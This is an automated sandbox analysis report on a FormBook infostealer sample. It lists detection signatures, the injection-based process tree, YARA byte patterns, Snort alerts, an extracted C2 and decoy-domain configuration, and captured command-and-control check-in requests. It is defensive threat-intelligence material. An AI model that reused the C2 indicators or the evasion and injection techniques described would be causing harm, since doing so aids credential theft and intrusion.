Loading ...

Play interactive tourEdit tour

Windows Analysis Report 85vLO1Rpcy.exe

Overview

General Information

Sample Name:85vLO1Rpcy.exe
Analysis ID:452681
MD5:91663bee11ec2466c36ff85805041fff
SHA1:944de18e73bbcf9807c960ba925641211d46cd6e
SHA256:b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 85vLO1Rpcy.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)
    • 85vLO1Rpcy.exe (PID: 6872 cmdline: 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: 91663BEE11EC2466C36FF85805041FFF)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6408 cmdline: /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.85vLO1Rpcy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.85vLO1Rpcy.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.85vLO1Rpcy.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        2.1.85vLO1Rpcy.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.85vLO1Rpcy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtwAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 85vLO1Rpcy.exeReversingLabs: Detection: 47%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: 85vLO1Rpcy.exeJoe Sandbox ML: detected
          Source: 1.2.85vLO1Rpcy.exe.2040000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.cscript.exe.4c87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.cscript.exe.2848758.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 85vLO1Rpcy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.241.62.54 162.241.62.54
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fitnesstwentytwenty.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 15:58:59 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmpString found in binary or memory: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
